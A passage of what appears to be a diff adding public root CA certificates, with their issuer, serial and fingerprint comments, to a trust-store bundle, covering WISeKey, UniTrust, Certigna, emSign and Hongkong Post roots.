85:60:f9:1c:36:24:da:ba:95:70:b5:fe:a0:db:e3:6f:f1:1a:83:23:be:94:86:85:4f:b3:f3:4a:55:71:19:8d +-----BEGIN CERTIFICATE----- +MIICaTCCAe+gAwIBAgIQISpWDK7aDKtARb8roi066jAKBggqhkjOPQQDAzBtMQsw +CQYDVQQGEwJDSDEQMA4GA1UEChMHV0lTZUtleTEiMCAGA1UECxMZT0lTVEUgRm91 +bmRhdGlvbiBFbmRvcnNlZDEoMCYGA1UEAxMfT0lTVEUgV0lTZUtleSBHbG9iYWwg +Um9vdCBHQyBDQTAeFw0xNzA1MDkwOTQ4MzRaFw00MjA1MDkwOTU4MzNaMG0xCzAJ +BgNVBAYTAkNIMRAwDgYDVQQKEwdXSVNlS2V5MSIwIAYDVQQLExlPSVNURSBGb3Vu +ZGF0aW9uIEVuZG9yc2VkMSgwJgYDVQQDEx9PSVNURSBXSVNlS2V5IEdsb2JhbCBS +b290IEdDIENBMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAETOlQwMYPchi82PG6s4ni +eUqjFqdrVCTbUf/q9Akkwwsin8tqJ4KBDdLArzHkdIJuyiXZjHWd8dvQmqJLIX4W +p2OQ0jnUsYd4XxiWD1AbNTcPasbc2RNNpI6QN+a9WzGRo1QwUjAOBgNVHQ8BAf8E +BAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUSIcUrOPDnpBgOtfKie7T +rYy0UGYwEAYJKwYBBAGCNxUBBAMCAQAwCgYIKoZIzj0EAwMDaAAwZQIwJsdpW9zV +57LnyAyMjMPdeYwbY9XJUpROTYJKcx6ygISpJcBMWm1JKWB4E+J+SOtkAjEA2zQg +Mgj/mkkCtojeFK9dbJlxjRo/i9fgojaGHAeCOnZT/cKi7e97sIBPWA9LUzm9 +-----END CERTIFICATE----- + +# 
Issuer: CN=UCA Global G2 Root O=UniTrust +# Subject: CN=UCA Global G2 Root O=UniTrust +# Label: "UCA Global G2 Root" +# Serial: 124779693093741543919145257850076631279 +# MD5 Fingerprint: 80:fe:f0:c4:4a:f0:5c:62:32:9f:1c:ba:78:a9:50:f8 +# SHA1 Fingerprint: 28:f9:78:16:19:7a:ff:18:25:18:aa:44:fe:c1:a0:ce:5c:b6:4c:8a +# SHA256 Fingerprint: 9b:ea:11:c9:76:fe:01:47:64:c1:be:56:a6:f9:14:b5:a5:60:31:7a:bd:99:88:39:33:82:e5:16:1a:a0:49:3c +-----BEGIN CERTIFICATE----- +MIIFRjCCAy6gAwIBAgIQXd+x2lqj7V2+WmUgZQOQ7zANBgkqhkiG9w0BAQsFADA9 +MQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxGzAZBgNVBAMMElVDQSBH +bG9iYWwgRzIgUm9vdDAeFw0xNjAzMTEwMDAwMDBaFw00MDEyMzEwMDAwMDBaMD0x +CzAJBgNVBAYTAkNOMREwDwYDVQQKDAhVbmlUcnVzdDEbMBkGA1UEAwwSVUNBIEds +b2JhbCBHMiBSb290MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxeYr +b3zvJgUno4Ek2m/LAfmZmqkywiKHYUGRO8vDaBsGxUypK8FnFyIdK+35KYmToni9 +kmugow2ifsqTs6bRjDXVdfkX9s9FxeV67HeToI8jrg4aA3++1NDtLnurRiNb/yzm +VHqUwCoV8MmNsHo7JOHXaOIxPAYzRrZUEaalLyJUKlgNAQLx+hVRZ2zA+te2G3/R +VogvGjqNO7uCEeBHANBSh6v7hn4PJGtAnTRnvI3HLYZveT6OqTwXS3+wmeOwcWDc +C/Vkw85DvG1xudLeJ1uK6NjGruFZfc8oLTW4lVYa8bJYS7cSN8h8s+1LgOGN+jIj +tm+3SJUIsUROhYw6AlQgL9+/V087OpAh18EmNVQg7Mc/R+zvWr9LesGtOxdQXGLY +D0tK3Cv6brxzks3sx1DoQZbXqX5t2Okdj4q1uViSukqSKwxW/YDrCPBeKW4bHAyv +j5OJrdu9o54hyokZ7N+1wxrrFv54NkzWbtA+FxyQF2smuvt6L78RHBgOLXMDj6Dl +NaBa4kx1HXHhOThTeEDMg5PXCp6dW4+K5OXgSORIskfNTip1KnvyIvbJvgmRlld6 +iIis7nCs+dwp4wwcOxJORNanTrAmyPPZGpeRaOrvjUYG0lZFWJo8DA+DuAUlwznP +O6Q0ibd5Ei9Hxeepl2n8pndntd978XplFeRhVmUCAwEAAaNCMEAwDgYDVR0PAQH/ +BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFIHEjMz15DD/pQwIX4wV +ZyF0Ad/fMA0GCSqGSIb3DQEBCwUAA4ICAQATZSL1jiutROTL/7lo5sOASD0Ee/oj +L3rtNtqyzm325p7lX1iPyzcyochltq44PTUbPrw7tgTQvPlJ9Zv3hcU2tsu8+Mg5 +1eRfB70VVJd0ysrtT7q6ZHafgbiERUlMjW+i67HM0cOU2kTC5uLqGOiiHycFutfl +1qnN3e92mI0ADs0b+gO3joBYDic/UvuUospeZcnWhNq5NXHzJsBPd+aBJ9J3O5oU +b3n09tDh05S60FdRvScFDcH9yBIw7m+NESsIndTUv4BFFJqIRNow6rSn4+7vW4LV +PtateJLbXDzz2K36uGt/xDYotgIVilQsnLAXc47QN6MUPJiVAAwpBVueSUmxX8fj +y88nZY41F7dXyDDZQVu5FLbowg+UMaeUmMxq67XhJ/UQqAHojhJi6IjMtX9Gl8Cb +EGY4GjZGXyJoPd/JxhMnq1MGrKI8hgZlb7F+sSlEmqO6SWkoaY/X5V+tBIZkbxqg +DMUIYs6Ao9Dz7GjevjPHF1t/gMRMTLGmhIrDO7gJzRSBuhjjVFc2/tsvfEehOjPI ++Vg7RE+xygKJBJYoaMVLuCaJu9YzL1DV/pqJuhgyklTGW+Cd+V7lDSKb9triyCGy +YiGqhkCyLmTTX8jjfhFnRR8F/uOi77Oos/N9j/gMHyIfLXC0uAE0djAA5SN4p1bX +UB+K+wb1whnw0A== +-----END CERTIFICATE----- + +# Issuer: CN=UCA Extended Validation Root O=UniTrust +# Subject: CN=UCA Extended Validation Root O=UniTrust +# Label: "UCA Extended Validation Root" +# Serial: 106100277556486529736699587978573607008 +# MD5 Fingerprint: a1:f3:5f:43:c6:34:9b:da:bf:8c:7e:05:53:ad:96:e2 +# SHA1 Fingerprint: a3:a1:b0:6f:24:61:23:4a:e3:36:a5:c2:37:fc:a6:ff:dd:f0:d7:3a +# SHA256 Fingerprint: d4:3a:f9:b3:54:73:75:5c:96:84:fc:06:d7:d8:cb:70:ee:5c:28:e7:73:fb:29:4e:b4:1e:e7:17:22:92:4d:24 +-----BEGIN CERTIFICATE----- +MIIFWjCCA0KgAwIBAgIQT9Irj/VkyDOeTzRYZiNwYDANBgkqhkiG9w0BAQsFADBH +MQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxJTAjBgNVBAMMHFVDQSBF +eHRlbmRlZCBWYWxpZGF0aW9uIFJvb3QwHhcNMTUwMzEzMDAwMDAwWhcNMzgxMjMx +MDAwMDAwWjBHMQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxJTAjBgNV +BAMMHFVDQSBFeHRlbmRlZCBWYWxpZGF0aW9uIFJvb3QwggIiMA0GCSqGSIb3DQEB +AQUAA4ICDwAwggIKAoICAQCpCQcoEwKwmeBkqh5DFnpzsZGgdT6o+uM4AHrsiWog +D4vFsJszA1qGxliG1cGFu0/GnEBNyr7uaZa4rYEwmnySBesFK5pI0Lh2PpbIILvS +sPGP2KxFRv+qZ2C0d35qHzwaUnoEPQc8hQ2E0B92CvdqFN9y4zR8V05WAT558aop +O2z6+I9tTcg1367r3CTueUWnhbYFiN6IXSV8l2RnCdm/WhUFhvMJHuxYMjMR83dk +sHYf5BA1FxvyDrFspCqjc/wJHx4yGVMR59mzLC52LqGj3n5qiAno8geK+LLNEOfi 
+c0CTuwjRP+H8C5SzJe98ptfRr5//lpr1kXuYC3fUfugH0mK1lTnj8/FtDw5lhIpj +VMWAtuCeS31HJqcBCF3RiJ7XwzJE+oJKCmhUfzhTA8ykADNkUVkLo4KRel7sFsLz +KuZi2irbWWIQJUoqgQtHB0MGcIfS+pMRKXpITeuUx3BNr2fVUbGAIAEBtHoIppB/ +TuDvB0GHr2qlXov7z1CymlSvw4m6WC31MJixNnI5fkkE/SmnTHnkBVfblLkWU41G +sx2VYVdWf6/wFlthWG82UBEL2KwrlRYaDh8IzTY0ZRBiZtWAXxQgXy0MoHgKaNYs +1+lvK9JKBZP8nm9rZ/+I8U6laUpSNwXqxhaN0sSZ0YIrO7o1dfdRUVjzyAfd5LQD +fwIDAQABo0IwQDAdBgNVHQ4EFgQU2XQ65DA9DfcS3H5aBZ8eNJr34RQwDwYDVR0T +AQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAYYwDQYJKoZIhvcNAQELBQADggIBADaN +l8xCFWQpN5smLNb7rhVpLGsaGvdftvkHTFnq88nIua7Mui563MD1sC3AO6+fcAUR +ap8lTwEpcOPlDOHqWnzcSbvBHiqB9RZLcpHIojG5qtr8nR/zXUACE/xOHAbKsxSQ +VBcZEhrxH9cMaVr2cXj0lH2RC47skFSOvG+hTKv8dGT9cZr4QQehzZHkPJrgmzI5 +c6sq1WnIeJEmMX3ixzDx/BR4dxIOE/TdFpS/S2d7cFOFyrC78zhNLJA5wA3CXWvp +4uXViI3WLL+rG761KIcSF3Ru/H38j9CHJrAb+7lsq+KePRXBOy5nAliRn+/4Qh8s +t2j1da3Ptfb/EX3C8CSlrdP6oDyp+l3cpaDvRKS+1ujl5BOWF3sGPjLtx7dCvHaj +2GU4Kzg1USEODm8uNBNA4StnDG1KQTAYI1oyVZnJF+A83vbsea0rWBmirSwiGpWO +vpaQXUJXxPkUAzUrHC1RVwinOt4/5Mi0A3PCwSaAuwtCH60NryZy2sy+s6ODWA2C +xR9GUeOcGMyNm43sSet1UNWMKFnKdDTajAshqx7qG+XH/RU+wBeq+yNuJkbL+vmx +cmtpzyKEC2IPrNkZAJSidjzULZrtBJ4tBmIQN1IchXIbJ+XMxjHsN+xjWZsLHXbM +fjKaiJUINlK73nZfdklJrX+9ZSCyycErdhh2n1ax +-----END CERTIFICATE----- + +# Issuer: CN=Certigna Root CA O=Dhimyotis OU=0002 48146308100036 +# Subject: CN=Certigna Root CA O=Dhimyotis OU=0002 48146308100036 +# Label: "Certigna Root CA" +# Serial: 269714418870597844693661054334862075617 +# MD5 Fingerprint: 0e:5c:30:62:27:eb:5b:bc:d7:ae:62:ba:e9:d5:df:77 +# SHA1 Fingerprint: 2d:0d:52:14:ff:9e:ad:99:24:01:74:20:47:6e:6c:85:27:27:f5:43 +# SHA256 Fingerprint: d4:8d:3d:23:ee:db:50:a4:59:e5:51:97:60:1c:27:77:4b:9d:7b:18:c9:4d:5a:05:95:11:a1:02:50:b9:31:68 +-----BEGIN CERTIFICATE----- +MIIGWzCCBEOgAwIBAgIRAMrpG4nxVQMNo+ZBbcTjpuEwDQYJKoZIhvcNAQELBQAw +WjELMAkGA1UEBhMCRlIxEjAQBgNVBAoMCURoaW15b3RpczEcMBoGA1UECwwTMDAw +MiA0ODE0NjMwODEwMDAzNjEZMBcGA1UEAwwQQ2VydGlnbmEgUm9vdCBDQTAeFw0x +MzEwMDEwODMyMjdaFw0zMzEwMDEwODMyMjdaMFoxCzAJBgNVBAYTAkZSMRIwEAYD +VQQKDAlEaGlteW90aXMxHDAaBgNVBAsMEzAwMDIgNDgxNDYzMDgxMDAwMzYxGTAX +BgNVBAMMEENlcnRpZ25hIFJvb3QgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAw +ggIKAoICAQDNGDllGlmx6mQWDoyUJJV8g9PFOSbcDO8WV43X2KyjQn+Cyu3NW9sO +ty3tRQgXstmzy9YXUnIo245Onoq2C/mehJpNdt4iKVzSs9IGPjA5qXSjklYcoW9M +CiBtnyN6tMbaLOQdLNyzKNAT8kxOAkmhVECe5uUFoC2EyP+YbNDrihqECB63aCPu +I9Vwzm1RaRDuoXrC0SIxwoKF0vJVdlB8JXrJhFwLrN1CTivngqIkicuQstDuI7pm +TLtipPlTWmR7fJj6o0ieD5Wupxj0auwuA0Wv8HT4Ks16XdG+RCYyKfHx9WzMfgIh +C59vpD++nVPiz32pLHxYGpfhPTc3GGYo0kDFUYqMwy3OU4gkWGQwFsWq4NYKpkDf +ePb1BHxpE4S80dGnBs8B92jAqFe7OmGtBIyT46388NtEbVncSVmurJqZNjBBe3Yz +IoejwpKGbvlw7q6Hh5UbxHq9MfPU0uWZ/75I7HX1eBYdpnDBfzwboZL7z8g81sWT +Co/1VTp2lc5ZmIoJlXcymoO6LAQ6l73UL77XbJuiyn1tJslV1c/DeVIICZkHJC1k +JWumIWmbat10TWuXekG9qxf5kBdIjzb5LdXF2+6qhUVB+s06RbFo5jZMm5BX7CO5 +hwjCxAnxl4YqKE3idMDaxIzb3+KhF1nOJFl0Mdp//TBt2dzhauH8XwIDAQABo4IB +GjCCARYwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYE +FBiHVuBud+4kNTxOc5of1uHieX4rMB8GA1UdIwQYMBaAFBiHVuBud+4kNTxOc5of +1uHieX4rMEQGA1UdIAQ9MDswOQYEVR0gADAxMC8GCCsGAQUFBwIBFiNodHRwczov +L3d3d3cuY2VydGlnbmEuZnIvYXV0b3JpdGVzLzBtBgNVHR8EZjBkMC+gLaArhilo +dHRwOi8vY3JsLmNlcnRpZ25hLmZyL2NlcnRpZ25hcm9vdGNhLmNybDAxoC+gLYYr +aHR0cDovL2NybC5kaGlteW90aXMuY29tL2NlcnRpZ25hcm9vdGNhLmNybDANBgkq +hkiG9w0BAQsFAAOCAgEAlLieT/DjlQgi581oQfccVdV8AOItOoldaDgvUSILSo3L +6btdPrtcPbEo/uRTVRPPoZAbAh1fZkYJMyjhDSSXcNMQH+pkV5a7XdrnxIxPTGRG +HVyH41neQtGbqH6mid2PHMkwgu07nM3A6RngatgCdTer9zQoKJHyBApPNeNgJgH6 +0BGM+RFq7q89w1DTj18zeTyGqHNFkIwgtnJzFyO+B2XleJINugHA64wcZr+shncB 
+lA2c5uk5jR+mUYyZDDl34bSb+hxnV29qao6pK0xXeXpXIs/NX2NGjVxZOob4Mkdi +o2cNGJHc+6Zr9UhhcyNZjgKnvETq9Emd8VRY+WCv2hikLyhF3HqgiIZd8zvn/yk1 +gPxkQ5Tm4xxvvq0OKmOZK8l+hfZx6AYDlf7ej0gcWtSS6Cvu5zHbugRqh5jnxV/v +faci9wHYTfmJ0A6aBVmknpjZbyvKcL5kwlWj9Omvw5Ip3IgWJJk8jSaYtlu3zM63 +Nwf9JtmYhST/WSMDmu2dnajkXjjO11INb9I/bbEFa0nOipFGc/T2L/Coc3cOZayh +jWZSaX5LaAzHHjcng6WMxwLkFM1JAbBzs/3GkDpv0mztO+7skb6iQ12LAEpmJURw +3kAP+HwV96LOPNdeE4yBFxgX0b3xdxA61GU5wSesVywlVP+i2k+KYTlerj1KjL0= +-----END CERTIFICATE----- + +# Issuer: CN=emSign Root CA - G1 O=eMudhra Technologies Limited OU=emSign PKI +# Subject: CN=emSign Root CA - G1 O=eMudhra Technologies Limited OU=emSign PKI +# Label: "emSign Root CA - G1" +# Serial: 235931866688319308814040 +# MD5 Fingerprint: 9c:42:84:57:dd:cb:0b:a7:2e:95:ad:b6:f3:da:bc:ac +# SHA1 Fingerprint: 8a:c7:ad:8f:73:ac:4e:c1:b5:75:4d:a5:40:f4:fc:cf:7c:b5:8e:8c +# SHA256 Fingerprint: 40:f6:af:03:46:a9:9a:a1:cd:1d:55:5a:4e:9c:ce:62:c7:f9:63:46:03:ee:40:66:15:83:3d:c8:c8:d0:03:67 +-----BEGIN CERTIFICATE----- +MIIDlDCCAnygAwIBAgIKMfXkYgxsWO3W2DANBgkqhkiG9w0BAQsFADBnMQswCQYD +VQQGEwJJTjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBU +ZWNobm9sb2dpZXMgTGltaXRlZDEcMBoGA1UEAxMTZW1TaWduIFJvb3QgQ0EgLSBH +MTAeFw0xODAyMTgxODMwMDBaFw00MzAyMTgxODMwMDBaMGcxCzAJBgNVBAYTAklO +MRMwEQYDVQQLEwplbVNpZ24gUEtJMSUwIwYDVQQKExxlTXVkaHJhIFRlY2hub2xv +Z2llcyBMaW1pdGVkMRwwGgYDVQQDExNlbVNpZ24gUm9vdCBDQSAtIEcxMIIBIjAN +BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAk0u76WaK7p1b1TST0Bsew+eeuGQz +f2N4aLTNLnF115sgxk0pvLZoYIr3IZpWNVrzdr3YzZr/k1ZLpVkGoZM0Kd0WNHVO +8oG0x5ZOrRkVUkr+PHB1cM2vK6sVmjM8qrOLqs1D/fXqcP/tzxE7lM5OMhbTI0Aq +d7OvPAEsbO2ZLIvZTmmYsvePQbAyeGHWDV/D+qJAkh1cF+ZwPjXnorfCYuKrpDhM +tTk1b+oDafo6VGiFbdbyL0NVHpENDtjVaqSW0RM8LHhQ6DqS0hdW5TUaQBw+jSzt +Od9C4INBdN+jzcKGYEho42kLVACL5HZpIQ15TjQIXhTCzLG3rdd8cIrHhQIDAQAB +o0IwQDAdBgNVHQ4EFgQU++8Nhp6w492pufEhF38+/PB3KxowDgYDVR0PAQH/BAQD +AgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAFn/8oz1h31x +PaOfG1vR2vjTnGs2vZupYeveFix0PZ7mddrXuqe8QhfnPZHr5X3dPpzxz5KsbEjM +wiI/aTvFthUvozXGaCocV685743QNcMYDHsAVhzNixl03r4PEuDQqqE/AjSxcM6d +GNYIAwlG7mDgfrbESQRRfXBgvKqy/3lyeqYdPV8q+Mri/Tm3R7nrft8EI6/6nAYH +6ftjk4BAtcZsCjEozgyfz7MjNYBBjWzEN3uBL4ChQEKF6dk4jeihU80Bv2noWgby +RQuQ+q7hv53yrlc8pa6yVvSLZUDp/TGBLPQ5Cdjua6e0ph0VpZj3AYHYhX3zUVxx +iN66zB+Afko= +-----END CERTIFICATE----- + +# Issuer: CN=emSign ECC Root CA - G3 O=eMudhra Technologies Limited OU=emSign PKI +# Subject: CN=emSign ECC Root CA - G3 O=eMudhra Technologies Limited OU=emSign PKI +# Label: "emSign ECC Root CA - G3" +# Serial: 287880440101571086945156 +# MD5 Fingerprint: ce:0b:72:d1:9f:88:8e:d0:50:03:e8:e3:b8:8b:67:40 +# SHA1 Fingerprint: 30:43:fa:4f:f2:57:dc:a0:c3:80:ee:2e:58:ea:78:b2:3f:e6:bb:c1 +# SHA256 Fingerprint: 86:a1:ec:ba:08:9c:4a:8d:3b:be:27:34:c6:12:ba:34:1d:81:3e:04:3c:f9:e8:a8:62:cd:5c:57:a3:6b:be:6b +-----BEGIN CERTIFICATE----- +MIICTjCCAdOgAwIBAgIKPPYHqWhwDtqLhDAKBggqhkjOPQQDAzBrMQswCQYDVQQG +EwJJTjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBUZWNo +bm9sb2dpZXMgTGltaXRlZDEgMB4GA1UEAxMXZW1TaWduIEVDQyBSb290IENBIC0g +RzMwHhcNMTgwMjE4MTgzMDAwWhcNNDMwMjE4MTgzMDAwWjBrMQswCQYDVQQGEwJJ +TjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBUZWNobm9s +b2dpZXMgTGltaXRlZDEgMB4GA1UEAxMXZW1TaWduIEVDQyBSb290IENBIC0gRzMw +djAQBgcqhkjOPQIBBgUrgQQAIgNiAAQjpQy4LRL1KPOxst3iAhKAnjlfSU2fySU0 +WXTsuwYc58Byr+iuL+FBVIcUqEqy6HyC5ltqtdyzdc6LBtCGI79G1Y4PPwT01xyS +fvalY8L1X44uT6EYGQIrMgqCZH0Wk9GjQjBAMB0GA1UdDgQWBBR8XQKEE9TMipuB +zhccLikenEhjQjAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAKBggq 
+hkjOPQQDAwNpADBmAjEAvvNhzwIQHWSVB7gYboiFBS+DCBeQyh+KTOgNG3qxrdWB +CUfvO6wIBHxcmbHtRwfSAjEAnbpV/KlK6O3t5nYBQnvI+GDZjVGLVTv7jHvrZQnD ++JbNR6iC8hZVdyR+EhCVBCyj +-----END CERTIFICATE----- + +# Issuer: CN=emSign Root CA - C1 O=eMudhra Inc OU=emSign PKI +# Subject: CN=emSign Root CA - C1 O=eMudhra Inc OU=emSign PKI +# Label: "emSign Root CA - C1" +# Serial: 825510296613316004955058 +# MD5 Fingerprint: d8:e3:5d:01:21:fa:78:5a:b0:df:ba:d2:ee:2a:5f:68 +# SHA1 Fingerprint: e7:2e:f1:df:fc:b2:09:28:cf:5d:d4:d5:67:37:b1:51:cb:86:4f:01 +# SHA256 Fingerprint: 12:56:09:aa:30:1d:a0:a2:49:b9:7a:82:39:cb:6a:34:21:6f:44:dc:ac:9f:39:54:b1:42:92:f2:e8:c8:60:8f +-----BEGIN CERTIFICATE----- +MIIDczCCAlugAwIBAgILAK7PALrEzzL4Q7IwDQYJKoZIhvcNAQELBQAwVjELMAkG +A1UEBhMCVVMxEzARBgNVBAsTCmVtU2lnbiBQS0kxFDASBgNVBAoTC2VNdWRocmEg +SW5jMRwwGgYDVQQDExNlbVNpZ24gUm9vdCBDQSAtIEMxMB4XDTE4MDIxODE4MzAw +MFoXDTQzMDIxODE4MzAwMFowVjELMAkGA1UEBhMCVVMxEzARBgNVBAsTCmVtU2ln +biBQS0kxFDASBgNVBAoTC2VNdWRocmEgSW5jMRwwGgYDVQQDExNlbVNpZ24gUm9v +dCBDQSAtIEMxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz+upufGZ +BczYKCFK83M0UYRWEPWgTywS4/oTmifQz/l5GnRfHXk5/Fv4cI7gklL35CX5VIPZ +HdPIWoU/Xse2B+4+wM6ar6xWQio5JXDWv7V7Nq2s9nPczdcdioOl+yuQFTdrHCZH +3DspVpNqs8FqOp099cGXOFgFixwR4+S0uF2FHYP+eF8LRWgYSKVGczQ7/g/IdrvH +GPMF0Ybzhe3nudkyrVWIzqa2kbBPrH4VI5b2P/AgNBbeCsbEBEV5f6f9vtKppa+c +xSMq9zwhbL2vj07FOrLzNBL834AaSaTUqZX3noleoomslMuoaJuvimUnzYnu3Yy1 +aylwQ6BpC+S5DwIDAQABo0IwQDAdBgNVHQ4EFgQU/qHgcB4qAzlSWkK+XJGFehiq +TbUwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL +BQADggEBAMJKVvoVIXsoounlHfv4LcQ5lkFMOycsxGwYFYDGrK9HWS8mC+M2sO87 +/kOXSTKZEhVb3xEp/6tT+LvBeA+snFOvV71ojD1pM/CjoCNjO2RnIkSt1XHLVip4 +kqNPEjE2NuLe/gDEo2APJ62gsIq1NnpSob0n9CAnYuhNlCQT5AoE6TyrLshDCUrG +YQTlSTR+08TI9Q/Aqum6VF7zYytPT1DU/rl7mYw9wC68AivTxEDkigcxHpvOJpkT ++xHqmiIMERnHXhuBUDDIlhJu58tBf5E7oke3VIAb3ADMmpDqw8NQBmIMMMAVSKeo +WXzhriKi4gp6D/piq1JM4fHfyr6DDUI= +-----END CERTIFICATE----- + +# Issuer: CN=emSign ECC Root CA - C3 O=eMudhra Inc OU=emSign PKI +# Subject: CN=emSign ECC Root CA - C3 O=eMudhra Inc OU=emSign PKI +# Label: "emSign ECC Root CA - C3" +# Serial: 582948710642506000014504 +# MD5 Fingerprint: 3e:53:b3:a3:81:ee:d7:10:f8:d3:b0:1d:17:92:f5:d5 +# SHA1 Fingerprint: b6:af:43:c2:9b:81:53:7d:f6:ef:6b:c3:1f:1f:60:15:0c:ee:48:66 +# SHA256 Fingerprint: bc:4d:80:9b:15:18:9d:78:db:3e:1d:8c:f4:f9:72:6a:79:5d:a1:64:3c:a5:f1:35:8e:1d:db:0e:dc:0d:7e:b3 +-----BEGIN CERTIFICATE----- +MIICKzCCAbGgAwIBAgIKe3G2gla4EnycqDAKBggqhkjOPQQDAzBaMQswCQYDVQQG +EwJVUzETMBEGA1UECxMKZW1TaWduIFBLSTEUMBIGA1UEChMLZU11ZGhyYSBJbmMx +IDAeBgNVBAMTF2VtU2lnbiBFQ0MgUm9vdCBDQSAtIEMzMB4XDTE4MDIxODE4MzAw +MFoXDTQzMDIxODE4MzAwMFowWjELMAkGA1UEBhMCVVMxEzARBgNVBAsTCmVtU2ln +biBQS0kxFDASBgNVBAoTC2VNdWRocmEgSW5jMSAwHgYDVQQDExdlbVNpZ24gRUND +IFJvb3QgQ0EgLSBDMzB2MBAGByqGSM49AgEGBSuBBAAiA2IABP2lYa57JhAd6bci +MK4G9IGzsUJxlTm801Ljr6/58pc1kjZGDoeVjbk5Wum739D+yAdBPLtVb4Ojavti +sIGJAnB9SMVK4+kiVCJNk7tCDK93nCOmfddhEc5lx/h//vXyqaNCMEAwHQYDVR0O +BBYEFPtaSNCAIEDyqOkAB2kZd6fmw/TPMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMB +Af8EBTADAQH/MAoGCCqGSM49BAMDA2gAMGUCMQC02C8Cif22TGK6Q04ThHK1rt0c +3ta13FaPWEBaLd4gTCKDypOofu4SQMfWh0/434UCMBwUZOR8loMRnLDRWmFLpg9J +0wD8ofzkpf9/rdcw0Md3f76BB1UwUCAU9Vc4CqgxUQ== +-----END CERTIFICATE----- + +# Issuer: CN=Hongkong Post Root CA 3 O=Hongkong Post +# Subject: CN=Hongkong Post Root CA 3 O=Hongkong Post +# Label: "Hongkong Post Root CA 3" +# Serial: 46170865288971385588281144162979347873371282084 +# MD5 Fingerprint: 11:fc:9f:bd:73:30:02:8a:fd:3f:f3:58:b9:cb:20:f0 +# SHA1 Fingerprint: 
58:a2:d0:ec:20:52:81:5b:c1:f3:f8:64:02:24:4e:c2:8e:02:4b:02 +# SHA256 Fingerprint: 5a:2f:c0:3f:0c:83:b0:90:bb:fa:40:60:4b:09:88:44:6c:76:36:18:3d:f9:84:6e:17:10:1a:44:7f:b8:ef:d6 +-----BEGIN CERTIFICATE----- +MIIFzzCCA7egAwIBAgIUCBZfikyl7ADJk0DfxMauI7gcWqQwDQYJKoZIhvcNAQEL +BQAwbzELMAkGA1UEBhMCSEsxEjAQBgNVBAgTCUhvbmcgS29uZzESMBAGA1UEBxMJ +SG9uZyBLb25nMRYwFAYDVQQKEw1Ib25na29uZyBQb3N0MSAwHgYDVQQDExdIb25n +a29uZyBQb3N0IFJvb3QgQ0EgMzAeFw0xNzA2MDMwMjI5NDZaFw00MjA2MDMwMjI5 +NDZaMG8xCzAJBgNVBAYTAkhLMRIwEAYDVQQIEwlIb25nIEtvbmcxEjAQBgNVBAcT +CUhvbmcgS29uZzEWMBQGA1UEChMNSG9uZ2tvbmcgUG9zdDEgMB4GA1UEAxMXSG9u +Z2tvbmcgUG9zdCBSb290IENBIDMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK +AoICAQCziNfqzg8gTr7m1gNt7ln8wlffKWihgw4+aMdoWJwcYEuJQwy51BWy7sFO +dem1p+/l6TWZ5Mwc50tfjTMwIDNT2aa71T4Tjukfh0mtUC1Qyhi+AViiE3CWu4mI +VoBc+L0sPOFMV4i707mV78vH9toxdCim5lSJ9UExyuUmGs2C4HDaOym71QP1mbpV +9WTRYA6ziUm4ii8F0oRFKHyPaFASePwLtVPLwpgchKOesL4jpNrcyCse2m5FHomY +2vkALgbpDDtw1VAliJnLzXNg99X/NWfFobxeq81KuEXryGgeDQ0URhLj0mRiikKY +vLTGCAj4/ahMZJx2Ab0vqWwzD9g/KLg8aQFChn5pwckGyuV6RmXpwtZQQS4/t+Tt +bNe/JgERohYpSms0BpDsE9K2+2p20jzt8NYt3eEV7KObLyzJPivkaTv/ciWxNoZb +x39ri1UbSsUgYT2uy1DhCDq+sI9jQVMwCFk8mB13umOResoQUGC/8Ne8lYePl8X+ +l2oBlKN8W4UdKjk60FSh0Tlxnf0h+bV78OLgAo9uliQlLKAeLKjEiafv7ZkGL7YK +TE/bosw3Gq9HhS2KX8Q0NEwA/RiTZxPRN+ZItIsGxVd7GYYKecsAyVKvQv83j+Gj +Hno9UKtjBucVtT+2RTeUN7F+8kjDf8V1/peNRY8apxpyKBpADwIDAQABo2MwYTAP +BgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAfBgNVHSMEGDAWgBQXnc0e +i9Y5K3DTXNSguB+wAPzFYTAdBgNVHQ4EFgQUF53NHovWOStw01zUoLgfsAD8xWEw +DQYJKoZIhvcNAQELBQADggIBAFbVe27mIgHSQpsY1Q7XZiNc4/6gx5LS6ZStS6LG +7BJ8dNVI0lkUmcDrudHr9EgwW62nV3OZqdPlt9EuWSRY3GguLmLYauRwCy0gUCCk +MpXRAJi70/33MvJJrsZ64Ee+bs7Lo3I6LWldy8joRTnU+kLBEUx3XZL7av9YROXr +gZ6voJmtvqkBZss4HTzfQx/0TW60uhdG/H39h4F5ag0zD/ov+BS5gLNdTaqX4fnk +GMX41TiMJjz98iji7lpJiCzfeT2OnpA8vUFKOt1b9pq0zj8lMH8yfaIDlNDceqFS +3m6TjRgm/VWsvY+b0s+v54Ysyx8Jb6NvqYTUc79NoXQbTiNg8swOqn+knEwlqLJm +Ozj/2ZQw9nKEvmhVEA/GcywWaZMH/rFF7buiVWqw2rVKAiUnhde3t4ZEFolsgCs+ 